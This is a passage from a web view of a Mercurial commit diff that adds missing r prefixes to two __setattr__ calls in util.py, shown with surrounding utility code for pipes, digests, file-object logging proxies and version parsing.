##// END OF EJS Templates
util: add missing r prefix on some __setattr__ calls...
Augie Fackler -
r36602:f5427483 default
parent child Browse files
Show More
@@ -1,4298 +1,4298 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 29 import io
30 30 import itertools
31 31 import mmap
32 32 import os
33 33 import platform as pyplatform
34 34 import re as remod
35 35 import shutil
36 36 import signal
37 37 import socket
38 38 import stat
39 39 import string
40 40 import subprocess
41 41 import sys
42 42 import tempfile
43 43 import textwrap
44 44 import time
45 45 import traceback
46 46 import warnings
47 47 import zlib
48 48
49 49 from . import (
50 50 encoding,
51 51 error,
52 52 i18n,
53 53 node as nodemod,
54 54 policy,
55 55 pycompat,
56 56 urllibcompat,
57 57 )
58 58
59 59 base85 = policy.importmod(r'base85')
60 60 osutil = policy.importmod(r'osutil')
61 61 parsers = policy.importmod(r'parsers')
62 62
63 63 b85decode = base85.b85decode
64 64 b85encode = base85.b85encode
65 65
66 66 cookielib = pycompat.cookielib
67 67 empty = pycompat.empty
68 68 httplib = pycompat.httplib
69 69 pickle = pycompat.pickle
70 70 queue = pycompat.queue
71 71 socketserver = pycompat.socketserver
72 72 stderr = pycompat.stderr
73 73 stdin = pycompat.stdin
74 74 stdout = pycompat.stdout
75 75 stringio = pycompat.stringio
76 76 xmlrpclib = pycompat.xmlrpclib
77 77
78 78 httpserver = urllibcompat.httpserver
79 79 urlerr = urllibcompat.urlerr
80 80 urlreq = urllibcompat.urlreq
81 81
82 82 # workaround for win32mbcs
83 83 _filenamebytestr = pycompat.bytestr
84 84
85 85 def isatty(fp):
86 86 try:
87 87 return fp.isatty()
88 88 except AttributeError:
89 89 return False
90 90
91 91 # glibc determines buffering on first write to stdout - if we replace a TTY
92 92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 93 # buffering
94 94 if isatty(stdout):
95 95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
96 96
97 97 if pycompat.iswindows:
98 98 from . import windows as platform
99 99 stdout = platform.winstdout(stdout)
100 100 else:
101 101 from . import posix as platform
102 102
103 103 _ = i18n._
104 104
105 105 bindunixsocket = platform.bindunixsocket
106 106 cachestat = platform.cachestat
107 107 checkexec = platform.checkexec
108 108 checklink = platform.checklink
109 109 copymode = platform.copymode
110 110 executablepath = platform.executablepath
111 111 expandglobs = platform.expandglobs
112 112 explainexit = platform.explainexit
113 113 findexe = platform.findexe
114 114 getfsmountpoint = platform.getfsmountpoint
115 115 getfstype = platform.getfstype
116 116 gethgcmd = platform.gethgcmd
117 117 getuser = platform.getuser
118 118 getpid = os.getpid
119 119 groupmembers = platform.groupmembers
120 120 groupname = platform.groupname
121 121 hidewindow = platform.hidewindow
122 122 isexec = platform.isexec
123 123 isowner = platform.isowner
124 124 listdir = osutil.listdir
125 125 localpath = platform.localpath
126 126 lookupreg = platform.lookupreg
127 127 makedir = platform.makedir
128 128 nlinks = platform.nlinks
129 129 normpath = platform.normpath
130 130 normcase = platform.normcase
131 131 normcasespec = platform.normcasespec
132 132 normcasefallback = platform.normcasefallback
133 133 openhardlinks = platform.openhardlinks
134 134 oslink = platform.oslink
135 135 parsepatchoutput = platform.parsepatchoutput
136 136 pconvert = platform.pconvert
137 137 poll = platform.poll
138 138 popen = platform.popen
139 139 posixfile = platform.posixfile
140 140 quotecommand = platform.quotecommand
141 141 readpipe = platform.readpipe
142 142 rename = platform.rename
143 143 removedirs = platform.removedirs
144 144 samedevice = platform.samedevice
145 145 samefile = platform.samefile
146 146 samestat = platform.samestat
147 147 setbinary = platform.setbinary
148 148 setflags = platform.setflags
149 149 setsignalhandler = platform.setsignalhandler
150 150 shellquote = platform.shellquote
151 151 shellsplit = platform.shellsplit
152 152 spawndetached = platform.spawndetached
153 153 split = platform.split
154 154 sshargs = platform.sshargs
155 155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 156 statisexec = platform.statisexec
157 157 statislink = platform.statislink
158 158 testpid = platform.testpid
159 159 umask = platform.umask
160 160 unlink = platform.unlink
161 161 username = platform.username
162 162
163 163 try:
164 164 recvfds = osutil.recvfds
165 165 except AttributeError:
166 166 pass
167 167 try:
168 168 setprocname = osutil.setprocname
169 169 except AttributeError:
170 170 pass
171 171 try:
172 172 unblocksignal = osutil.unblocksignal
173 173 except AttributeError:
174 174 pass
175 175
176 176 # Python compatibility
177 177
178 178 _notset = object()
179 179
180 180 # disable Python's problematic floating point timestamps (issue4836)
181 181 # (Python hypocritically says you shouldn't change this behavior in
182 182 # libraries, and sure enough Mercurial is not a library.)
183 183 os.stat_float_times(False)
184 184
185 185 def safehasattr(thing, attr):
186 186 return getattr(thing, attr, _notset) is not _notset
187 187
188 188 def _rapply(f, xs):
189 189 if xs is None:
190 190 # assume None means non-value of optional data
191 191 return xs
192 192 if isinstance(xs, (list, set, tuple)):
193 193 return type(xs)(_rapply(f, x) for x in xs)
194 194 if isinstance(xs, dict):
195 195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
196 196 return f(xs)
197 197
198 198 def rapply(f, xs):
199 199 """Apply function recursively to every item preserving the data structure
200 200
201 201 >>> def f(x):
202 202 ... return 'f(%s)' % x
203 203 >>> rapply(f, None) is None
204 204 True
205 205 >>> rapply(f, 'a')
206 206 'f(a)'
207 207 >>> rapply(f, {'a'}) == {'f(a)'}
208 208 True
209 209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
210 210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
211 211
212 212 >>> xs = [object()]
213 213 >>> rapply(pycompat.identity, xs) is xs
214 214 True
215 215 """
216 216 if f is pycompat.identity:
217 217 # fast path mainly for py2
218 218 return xs
219 219 return _rapply(f, xs)
220 220
221 221 def bytesinput(fin, fout, *args, **kwargs):
222 222 sin, sout = sys.stdin, sys.stdout
223 223 try:
224 224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
225 225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
226 226 finally:
227 227 sys.stdin, sys.stdout = sin, sout
228 228
229 229 def bitsfrom(container):
230 230 bits = 0
231 231 for bit in container:
232 232 bits |= bit
233 233 return bits
234 234
235 235 # python 2.6 still have deprecation warning enabled by default. We do not want
236 236 # to display anything to standard user so detect if we are running test and
237 237 # only use python deprecation warning in this case.
238 238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
239 239 if _dowarn:
240 240 # explicitly unfilter our warning for python 2.7
241 241 #
242 242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
243 243 # However, module name set through PYTHONWARNINGS was exactly matched, so
244 244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
245 245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
246 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
247 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
248 248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
249 249
250 250 def nouideprecwarn(msg, version, stacklevel=1):
251 251 """Issue an python native deprecation warning
252 252
253 253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
254 254 """
255 255 if _dowarn:
256 256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
257 257 " update your code.)") % version
258 258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
259 259
260 260 DIGESTS = {
261 261 'md5': hashlib.md5,
262 262 'sha1': hashlib.sha1,
263 263 'sha512': hashlib.sha512,
264 264 }
265 265 # List of digest types from strongest to weakest
266 266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
267 267
268 268 for k in DIGESTS_BY_STRENGTH:
269 269 assert k in DIGESTS
270 270
271 271 class digester(object):
272 272 """helper to compute digests.
273 273
274 274 This helper can be used to compute one or more digests given their name.
275 275
276 276 >>> d = digester([b'md5', b'sha1'])
277 277 >>> d.update(b'foo')
278 278 >>> [k for k in sorted(d)]
279 279 ['md5', 'sha1']
280 280 >>> d[b'md5']
281 281 'acbd18db4cc2f85cedef654fccc4a4d8'
282 282 >>> d[b'sha1']
283 283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
284 284 >>> digester.preferred([b'md5', b'sha1'])
285 285 'sha1'
286 286 """
287 287
288 288 def __init__(self, digests, s=''):
289 289 self._hashes = {}
290 290 for k in digests:
291 291 if k not in DIGESTS:
292 292 raise Abort(_('unknown digest type: %s') % k)
293 293 self._hashes[k] = DIGESTS[k]()
294 294 if s:
295 295 self.update(s)
296 296
297 297 def update(self, data):
298 298 for h in self._hashes.values():
299 299 h.update(data)
300 300
301 301 def __getitem__(self, key):
302 302 if key not in DIGESTS:
303 303 raise Abort(_('unknown digest type: %s') % k)
304 304 return nodemod.hex(self._hashes[key].digest())
305 305
306 306 def __iter__(self):
307 307 return iter(self._hashes)
308 308
309 309 @staticmethod
310 310 def preferred(supported):
311 311 """returns the strongest digest type in both supported and DIGESTS."""
312 312
313 313 for k in DIGESTS_BY_STRENGTH:
314 314 if k in supported:
315 315 return k
316 316 return None
317 317
318 318 class digestchecker(object):
319 319 """file handle wrapper that additionally checks content against a given
320 320 size and digests.
321 321
322 322 d = digestchecker(fh, size, {'md5': '...'})
323 323
324 324 When multiple digests are given, all of them are validated.
325 325 """
326 326
327 327 def __init__(self, fh, size, digests):
328 328 self._fh = fh
329 329 self._size = size
330 330 self._got = 0
331 331 self._digests = dict(digests)
332 332 self._digester = digester(self._digests.keys())
333 333
334 334 def read(self, length=-1):
335 335 content = self._fh.read(length)
336 336 self._digester.update(content)
337 337 self._got += len(content)
338 338 return content
339 339
340 340 def validate(self):
341 341 if self._size != self._got:
342 342 raise Abort(_('size mismatch: expected %d, got %d') %
343 343 (self._size, self._got))
344 344 for k, v in self._digests.items():
345 345 if v != self._digester[k]:
346 346 # i18n: first parameter is a digest name
347 347 raise Abort(_('%s mismatch: expected %s, got %s') %
348 348 (k, v, self._digester[k]))
349 349
350 350 try:
351 351 buffer = buffer
352 352 except NameError:
353 353 def buffer(sliceable, offset=0, length=None):
354 354 if length is not None:
355 355 return memoryview(sliceable)[offset:offset + length]
356 356 return memoryview(sliceable)[offset:]
357 357
358 358 closefds = pycompat.isposix
359 359
360 360 _chunksize = 4096
361 361
362 362 class bufferedinputpipe(object):
363 363 """a manually buffered input pipe
364 364
365 365 Python will not let us use buffered IO and lazy reading with 'polling' at
366 366 the same time. We cannot probe the buffer state and select will not detect
367 367 that data are ready to read if they are already buffered.
368 368
369 369 This class let us work around that by implementing its own buffering
370 370 (allowing efficient readline) while offering a way to know if the buffer is
371 371 empty from the output (allowing collaboration of the buffer with polling).
372 372
373 373 This class lives in the 'util' module because it makes use of the 'os'
374 374 module from the python stdlib.
375 375 """
376 376 def __new__(cls, fh):
377 377 # If we receive a fileobjectproxy, we need to use a variation of this
378 378 # class that notifies observers about activity.
379 379 if isinstance(fh, fileobjectproxy):
380 380 cls = observedbufferedinputpipe
381 381
382 382 return super(bufferedinputpipe, cls).__new__(cls)
383 383
384 384 def __init__(self, input):
385 385 self._input = input
386 386 self._buffer = []
387 387 self._eof = False
388 388 self._lenbuf = 0
389 389
390 390 @property
391 391 def hasbuffer(self):
392 392 """True is any data is currently buffered
393 393
394 394 This will be used externally a pre-step for polling IO. If there is
395 395 already data then no polling should be set in place."""
396 396 return bool(self._buffer)
397 397
398 398 @property
399 399 def closed(self):
400 400 return self._input.closed
401 401
402 402 def fileno(self):
403 403 return self._input.fileno()
404 404
405 405 def close(self):
406 406 return self._input.close()
407 407
408 408 def read(self, size):
409 409 while (not self._eof) and (self._lenbuf < size):
410 410 self._fillbuffer()
411 411 return self._frombuffer(size)
412 412
413 413 def readline(self, *args, **kwargs):
414 414 if 1 < len(self._buffer):
415 415 # this should not happen because both read and readline end with a
416 416 # _frombuffer call that collapse it.
417 417 self._buffer = [''.join(self._buffer)]
418 418 self._lenbuf = len(self._buffer[0])
419 419 lfi = -1
420 420 if self._buffer:
421 421 lfi = self._buffer[-1].find('\n')
422 422 while (not self._eof) and lfi < 0:
423 423 self._fillbuffer()
424 424 if self._buffer:
425 425 lfi = self._buffer[-1].find('\n')
426 426 size = lfi + 1
427 427 if lfi < 0: # end of file
428 428 size = self._lenbuf
429 429 elif 1 < len(self._buffer):
430 430 # we need to take previous chunks into account
431 431 size += self._lenbuf - len(self._buffer[-1])
432 432 return self._frombuffer(size)
433 433
434 434 def _frombuffer(self, size):
435 435 """return at most 'size' data from the buffer
436 436
437 437 The data are removed from the buffer."""
438 438 if size == 0 or not self._buffer:
439 439 return ''
440 440 buf = self._buffer[0]
441 441 if 1 < len(self._buffer):
442 442 buf = ''.join(self._buffer)
443 443
444 444 data = buf[:size]
445 445 buf = buf[len(data):]
446 446 if buf:
447 447 self._buffer = [buf]
448 448 self._lenbuf = len(buf)
449 449 else:
450 450 self._buffer = []
451 451 self._lenbuf = 0
452 452 return data
453 453
454 454 def _fillbuffer(self):
455 455 """read data to the buffer"""
456 456 data = os.read(self._input.fileno(), _chunksize)
457 457 if not data:
458 458 self._eof = True
459 459 else:
460 460 self._lenbuf += len(data)
461 461 self._buffer.append(data)
462 462
463 463 return data
464 464
465 465 def mmapread(fp):
466 466 try:
467 467 fd = getattr(fp, 'fileno', lambda: fp)()
468 468 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
469 469 except ValueError:
470 470 # Empty files cannot be mmapped, but mmapread should still work. Check
471 471 # if the file is empty, and if so, return an empty buffer.
472 472 if os.fstat(fd).st_size == 0:
473 473 return ''
474 474 raise
475 475
476 476 def popen2(cmd, env=None, newlines=False):
477 477 # Setting bufsize to -1 lets the system decide the buffer size.
478 478 # The default for bufsize is 0, meaning unbuffered. This leads to
479 479 # poor performance on Mac OS X: http://bugs.python.org/issue4194
480 480 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
481 481 close_fds=closefds,
482 482 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
483 483 universal_newlines=newlines,
484 484 env=env)
485 485 return p.stdin, p.stdout
486 486
487 487 def popen3(cmd, env=None, newlines=False):
488 488 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
489 489 return stdin, stdout, stderr
490 490
491 491 def popen4(cmd, env=None, newlines=False, bufsize=-1):
492 492 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
493 493 close_fds=closefds,
494 494 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
495 495 stderr=subprocess.PIPE,
496 496 universal_newlines=newlines,
497 497 env=env)
498 498 return p.stdin, p.stdout, p.stderr, p
499 499
500 500 class fileobjectproxy(object):
501 501 """A proxy around file objects that tells a watcher when events occur.
502 502
503 503 This type is intended to only be used for testing purposes. Think hard
504 504 before using it in important code.
505 505 """
506 506 __slots__ = (
507 507 r'_orig',
508 508 r'_observer',
509 509 )
510 510
511 511 def __init__(self, fh, observer):
512 object.__setattr__(self, '_orig', fh)
513 object.__setattr__(self, '_observer', observer)
512 object.__setattr__(self, r'_orig', fh)
513 object.__setattr__(self, r'_observer', observer)
514 514
515 515 def __getattribute__(self, name):
516 516 ours = {
517 517 r'_observer',
518 518
519 519 # IOBase
520 520 r'close',
521 521 # closed if a property
522 522 r'fileno',
523 523 r'flush',
524 524 r'isatty',
525 525 r'readable',
526 526 r'readline',
527 527 r'readlines',
528 528 r'seek',
529 529 r'seekable',
530 530 r'tell',
531 531 r'truncate',
532 532 r'writable',
533 533 r'writelines',
534 534 # RawIOBase
535 535 r'read',
536 536 r'readall',
537 537 r'readinto',
538 538 r'write',
539 539 # BufferedIOBase
540 540 # raw is a property
541 541 r'detach',
542 542 # read defined above
543 543 r'read1',
544 544 # readinto defined above
545 545 # write defined above
546 546 }
547 547
548 548 # We only observe some methods.
549 549 if name in ours:
550 550 return object.__getattribute__(self, name)
551 551
552 552 return getattr(object.__getattribute__(self, r'_orig'), name)
553 553
554 554 def __delattr__(self, name):
555 555 return delattr(object.__getattribute__(self, r'_orig'), name)
556 556
557 557 def __setattr__(self, name, value):
558 558 return setattr(object.__getattribute__(self, r'_orig'), name, value)
559 559
560 560 def __iter__(self):
561 561 return object.__getattribute__(self, r'_orig').__iter__()
562 562
563 563 def _observedcall(self, name, *args, **kwargs):
564 564 # Call the original object.
565 565 orig = object.__getattribute__(self, r'_orig')
566 566 res = getattr(orig, name)(*args, **kwargs)
567 567
568 568 # Call a method on the observer of the same name with arguments
569 569 # so it can react, log, etc.
570 570 observer = object.__getattribute__(self, r'_observer')
571 571 fn = getattr(observer, name, None)
572 572 if fn:
573 573 fn(res, *args, **kwargs)
574 574
575 575 return res
576 576
577 577 def close(self, *args, **kwargs):
578 578 return object.__getattribute__(self, r'_observedcall')(
579 579 r'close', *args, **kwargs)
580 580
581 581 def fileno(self, *args, **kwargs):
582 582 return object.__getattribute__(self, r'_observedcall')(
583 583 r'fileno', *args, **kwargs)
584 584
585 585 def flush(self, *args, **kwargs):
586 586 return object.__getattribute__(self, r'_observedcall')(
587 587 r'flush', *args, **kwargs)
588 588
589 589 def isatty(self, *args, **kwargs):
590 590 return object.__getattribute__(self, r'_observedcall')(
591 591 r'isatty', *args, **kwargs)
592 592
593 593 def readable(self, *args, **kwargs):
594 594 return object.__getattribute__(self, r'_observedcall')(
595 595 r'readable', *args, **kwargs)
596 596
597 597 def readline(self, *args, **kwargs):
598 598 return object.__getattribute__(self, r'_observedcall')(
599 599 r'readline', *args, **kwargs)
600 600
601 601 def readlines(self, *args, **kwargs):
602 602 return object.__getattribute__(self, r'_observedcall')(
603 603 r'readlines', *args, **kwargs)
604 604
605 605 def seek(self, *args, **kwargs):
606 606 return object.__getattribute__(self, r'_observedcall')(
607 607 r'seek', *args, **kwargs)
608 608
609 609 def seekable(self, *args, **kwargs):
610 610 return object.__getattribute__(self, r'_observedcall')(
611 611 r'seekable', *args, **kwargs)
612 612
613 613 def tell(self, *args, **kwargs):
614 614 return object.__getattribute__(self, r'_observedcall')(
615 615 r'tell', *args, **kwargs)
616 616
617 617 def truncate(self, *args, **kwargs):
618 618 return object.__getattribute__(self, r'_observedcall')(
619 619 r'truncate', *args, **kwargs)
620 620
621 621 def writable(self, *args, **kwargs):
622 622 return object.__getattribute__(self, r'_observedcall')(
623 623 r'writable', *args, **kwargs)
624 624
625 625 def writelines(self, *args, **kwargs):
626 626 return object.__getattribute__(self, r'_observedcall')(
627 627 r'writelines', *args, **kwargs)
628 628
629 629 def read(self, *args, **kwargs):
630 630 return object.__getattribute__(self, r'_observedcall')(
631 631 r'read', *args, **kwargs)
632 632
633 633 def readall(self, *args, **kwargs):
634 634 return object.__getattribute__(self, r'_observedcall')(
635 635 r'readall', *args, **kwargs)
636 636
637 637 def readinto(self, *args, **kwargs):
638 638 return object.__getattribute__(self, r'_observedcall')(
639 639 r'readinto', *args, **kwargs)
640 640
641 641 def write(self, *args, **kwargs):
642 642 return object.__getattribute__(self, r'_observedcall')(
643 643 r'write', *args, **kwargs)
644 644
645 645 def detach(self, *args, **kwargs):
646 646 return object.__getattribute__(self, r'_observedcall')(
647 647 r'detach', *args, **kwargs)
648 648
649 649 def read1(self, *args, **kwargs):
650 650 return object.__getattribute__(self, r'_observedcall')(
651 651 r'read1', *args, **kwargs)
652 652
653 653 class observedbufferedinputpipe(bufferedinputpipe):
654 654 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
655 655
656 656 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
657 657 bypass ``fileobjectproxy``. Because of this, we need to make
658 658 ``bufferedinputpipe`` aware of these operations.
659 659
660 660 This variation of ``bufferedinputpipe`` can notify observers about
661 661 ``os.read()`` events. It also re-publishes other events, such as
662 662 ``read()`` and ``readline()``.
663 663 """
664 664 def _fillbuffer(self):
665 665 res = super(observedbufferedinputpipe, self)._fillbuffer()
666 666
667 667 fn = getattr(self._input._observer, r'osread', None)
668 668 if fn:
669 669 fn(res, _chunksize)
670 670
671 671 return res
672 672
673 673 # We use different observer methods because the operation isn't
674 674 # performed on the actual file object but on us.
675 675 def read(self, size):
676 676 res = super(observedbufferedinputpipe, self).read(size)
677 677
678 678 fn = getattr(self._input._observer, r'bufferedread', None)
679 679 if fn:
680 680 fn(res, size)
681 681
682 682 return res
683 683
684 684 def readline(self, *args, **kwargs):
685 685 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
686 686
687 687 fn = getattr(self._input._observer, r'bufferedreadline', None)
688 688 if fn:
689 689 fn(res)
690 690
691 691 return res
692 692
693 693 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
694 694 DATA_ESCAPE_MAP.update({
695 695 b'\\': b'\\\\',
696 696 b'\r': br'\r',
697 697 b'\n': br'\n',
698 698 })
699 699 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
700 700
701 701 def escapedata(s):
702 702 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
703 703
704 704 class fileobjectobserver(object):
705 705 """Logs file object activity."""
706 706 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
707 707 self.fh = fh
708 708 self.name = name
709 709 self.logdata = logdata
710 710 self.reads = reads
711 711 self.writes = writes
712 712
713 713 def _writedata(self, data):
714 714 if not self.logdata:
715 715 self.fh.write('\n')
716 716 return
717 717
718 718 # Simple case writes all data on a single line.
719 719 if b'\n' not in data:
720 720 self.fh.write(': %s\n' % escapedata(data))
721 721 return
722 722
723 723 # Data with newlines is written to multiple lines.
724 724 self.fh.write(':\n')
725 725 lines = data.splitlines(True)
726 726 for line in lines:
727 727 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
728 728
729 729 def read(self, res, size=-1):
730 730 if not self.reads:
731 731 return
732 732
733 733 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
734 734 self._writedata(res)
735 735
736 736 def readline(self, res, limit=-1):
737 737 if not self.reads:
738 738 return
739 739
740 740 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
741 741 self._writedata(res)
742 742
743 743 def write(self, res, data):
744 744 if not self.writes:
745 745 return
746 746
747 747 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
748 748 self._writedata(data)
749 749
750 750 def flush(self, res):
751 751 if not self.writes:
752 752 return
753 753
754 754 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
755 755
756 756 # For observedbufferedinputpipe.
757 757 def bufferedread(self, res, size):
758 758 self.fh.write('%s> bufferedread(%d) -> %d' % (
759 759 self.name, size, len(res)))
760 760 self._writedata(res)
761 761
762 762 def bufferedreadline(self, res):
763 763 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
764 764 self._writedata(res)
765 765
766 766 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
767 767 logdata=False):
768 768 """Turn a file object into a logging file object."""
769 769
770 770 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
771 771 logdata=logdata)
772 772 return fileobjectproxy(fh, observer)
773 773
774 774 def version():
775 775 """Return version information if available."""
776 776 try:
777 777 from . import __version__
778 778 return __version__.version
779 779 except ImportError:
780 780 return 'unknown'
781 781
782 782 def versiontuple(v=None, n=4):
783 783 """Parses a Mercurial version string into an N-tuple.
784 784
785 785 The version string to be parsed is specified with the ``v`` argument.
786 786 If it isn't defined, the current Mercurial version string will be parsed.
787 787
788 788 ``n`` can be 2, 3, or 4. Here is how some version strings map to
789 789 returned values:
790 790
791 791 >>> v = b'3.6.1+190-df9b73d2d444'
792 792 >>> versiontuple(v, 2)
793 793 (3, 6)
794 794 >>> versiontuple(v, 3)
795 795 (3, 6, 1)
796 796 >>> versiontuple(v, 4)
797 797 (3, 6, 1, '190-df9b73d2d444')
798 798
799 799 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
800 800 (3, 6, 1, '190-df9b73d2d444+20151118')
801 801
802 802 >>> v = b'3.6'
803 803 >>> versiontuple(v, 2)
804 804 (3, 6)
805 805 >>> versiontuple(v, 3)
806 806 (3, 6, None)
807 807 >>> versiontuple(v, 4)
808 808 (3, 6, None, None)
809 809
810 810 >>> v = b'3.9-rc'
811 811 >>> versiontuple(v, 2)
812 812 (3, 9)
813 813 >>> versiontuple(v, 3)
814 814 (3, 9, None)
815 815 >>> versiontuple(v, 4)
816 816 (3, 9, None, 'rc')
817 817
818 818 >>> v = b'3.9-rc+2-02a8fea4289b'
819 819 >>> versiontuple(v, 2)
820 820 (3, 9)
821 821 >>> versiontuple(v, 3)
822 822 (3, 9, None)
823 823 >>> versiontuple(v, 4)
824 824 (3, 9, None, 'rc+2-02a8fea4289b')
825 825 """
826 826 if not v:
827 827 v = version()
828 828 parts = remod.split('[\+-]', v, 1)
829 829 if len(parts) == 1:
830 830 vparts, extra = parts[0], None
831 831 else:
832 832 vparts, extra = parts
833 833
834 834 vints = []
835 835 for i in vparts.split('.'):
836 836 try:
837 837 vints.append(int(i))
838 838 except ValueError:
839 839 break
840 840 # (3, 6) -> (3, 6, None)
841 841 while len(vints) < 3:
842 842 vints.append(None)
843 843
844 844 if n == 2:
845 845 return (vints[0], vints[1])
846 846 if n == 3:
847 847 return (vints[0], vints[1], vints[2])
848 848 if n == 4:
849 849 return (vints[0], vints[1], vints[2], extra)
850 850
851 851 # used by parsedate
852 852 defaultdateformats = (
853 853 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
854 854 '%Y-%m-%dT%H:%M', # without seconds
855 855 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
856 856 '%Y-%m-%dT%H%M', # without seconds
857 857 '%Y-%m-%d %H:%M:%S', # our common legal variant
858 858 '%Y-%m-%d %H:%M', # without seconds
859 859 '%Y-%m-%d %H%M%S', # without :
860 860 '%Y-%m-%d %H%M', # without seconds
861 861 '%Y-%m-%d %I:%M:%S%p',
862 862 '%Y-%m-%d %H:%M',
863 863 '%Y-%m-%d %I:%M%p',
864 864 '%Y-%m-%d',
865 865 '%m-%d',
866 866 '%m/%d',
867 867 '%m/%d/%y',
868 868 '%m/%d/%Y',
869 869 '%a %b %d %H:%M:%S %Y',
870 870 '%a %b %d %I:%M:%S%p %Y',
871 871 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
872 872 '%b %d %H:%M:%S %Y',
873 873 '%b %d %I:%M:%S%p %Y',
874 874 '%b %d %H:%M:%S',
875 875 '%b %d %I:%M:%S%p',
876 876 '%b %d %H:%M',
877 877 '%b %d %I:%M%p',
878 878 '%b %d %Y',
879 879 '%b %d',
880 880 '%H:%M:%S',
881 881 '%I:%M:%S%p',
882 882 '%H:%M',
883 883 '%I:%M%p',
884 884 )
885 885
886 886 extendeddateformats = defaultdateformats + (
887 887 "%Y",
888 888 "%Y-%m",
889 889 "%b",
890 890 "%b %Y",
891 891 )
892 892
893 893 def cachefunc(func):
894 894 '''cache the result of function calls'''
895 895 # XXX doesn't handle keywords args
896 896 if func.__code__.co_argcount == 0:
897 897 cache = []
898 898 def f():
899 899 if len(cache) == 0:
900 900 cache.append(func())
901 901 return cache[0]
902 902 return f
903 903 cache = {}
904 904 if func.__code__.co_argcount == 1:
905 905 # we gain a small amount of time because
906 906 # we don't need to pack/unpack the list
907 907 def f(arg):
908 908 if arg not in cache:
909 909 cache[arg] = func(arg)
910 910 return cache[arg]
911 911 else:
912 912 def f(*args):
913 913 if args not in cache:
914 914 cache[args] = func(*args)
915 915 return cache[args]
916 916
917 917 return f
918 918
919 919 class cow(object):
920 920 """helper class to make copy-on-write easier
921 921
922 922 Call preparewrite before doing any writes.
923 923 """
924 924
925 925 def preparewrite(self):
926 926 """call this before writes, return self or a copied new object"""
927 927 if getattr(self, '_copied', 0):
928 928 self._copied -= 1
929 929 return self.__class__(self)
930 930 return self
931 931
932 932 def copy(self):
933 933 """always do a cheap copy"""
934 934 self._copied = getattr(self, '_copied', 0) + 1
935 935 return self
936 936
937 937 class sortdict(collections.OrderedDict):
938 938 '''a simple sorted dictionary
939 939
940 940 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
941 941 >>> d2 = d1.copy()
942 942 >>> d2
943 943 sortdict([('a', 0), ('b', 1)])
944 944 >>> d2.update([(b'a', 2)])
945 945 >>> list(d2.keys()) # should still be in last-set order
946 946 ['b', 'a']
947 947 '''
948 948
949 949 def __setitem__(self, key, value):
950 950 if key in self:
951 951 del self[key]
952 952 super(sortdict, self).__setitem__(key, value)
953 953
954 954 if pycompat.ispypy:
955 955 # __setitem__() isn't called as of PyPy 5.8.0
956 956 def update(self, src):
957 957 if isinstance(src, dict):
958 958 src = src.iteritems()
959 959 for k, v in src:
960 960 self[k] = v
961 961
962 962 class cowdict(cow, dict):
963 963 """copy-on-write dict
964 964
965 965 Be sure to call d = d.preparewrite() before writing to d.
966 966
967 967 >>> a = cowdict()
968 968 >>> a is a.preparewrite()
969 969 True
970 970 >>> b = a.copy()
971 971 >>> b is a
972 972 True
973 973 >>> c = b.copy()
974 974 >>> c is a
975 975 True
976 976 >>> a = a.preparewrite()
